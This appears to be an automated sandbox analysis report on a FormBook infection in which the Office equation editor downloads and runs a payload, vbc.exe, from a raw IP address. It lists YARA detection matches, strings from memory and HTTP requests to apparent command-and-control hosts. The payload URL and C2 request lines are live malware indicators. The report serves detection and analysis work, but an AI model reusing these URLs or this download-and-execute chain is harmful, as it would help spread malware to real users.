        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: EQNEDT32.EXE, 00000002.00000002.966815711.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: EQNEDT32.EXE, 00000002.00000002.966815711.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
        Source: EQNEDT32.EXE, 00000002.00000002.966770565.0000000000594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.25/gtb/vbc.exe
        Source: EQNEDT32.EXE, 00000002.00000002.966741326.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.25/gtb/vbc.exehhC:
        Source: EQNEDT32.EXE, 00000002.00000002.967017696.0000000003660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.25/gtb/vbc.exej
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: vbc.exe, 00000004.00000000.965645699.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.996078709.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: explorer.exe, 00000007.00000000.1023300017.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
        Source: explorer.exe, 00000007.00000000.998621484.00000000077C9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: explorer.exe, 00000007.00000000.999392147.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: explorer.exe, 00000007.00000000.1025885348.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999748239.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
        Source: explorer.exe, 00000007.00000000.999886715.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014689311.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999403275.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.990012033.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014285253.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1002158677.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016145834.00000000003A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: explorer.exe, 00000007.00000000.1050559717.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019814122.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004615683.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
        Source: explorer.exe, 00000007.00000000.1021455911.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995504335.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006602259.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F22AACBE.emfJump to behavior
        Source: unknownDNS traffic detected: queries for: www.insurancecentral.info
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: global trafficHTTP traffic detected: GET /gtb/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.25Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1Host: www.xinli-ac.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Office equation editor drops PE file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: 2.2.EQNEDT32.EXE.5acf30.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
        Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 2.2.EQNEDT32.EXE.5acf30.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
        Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
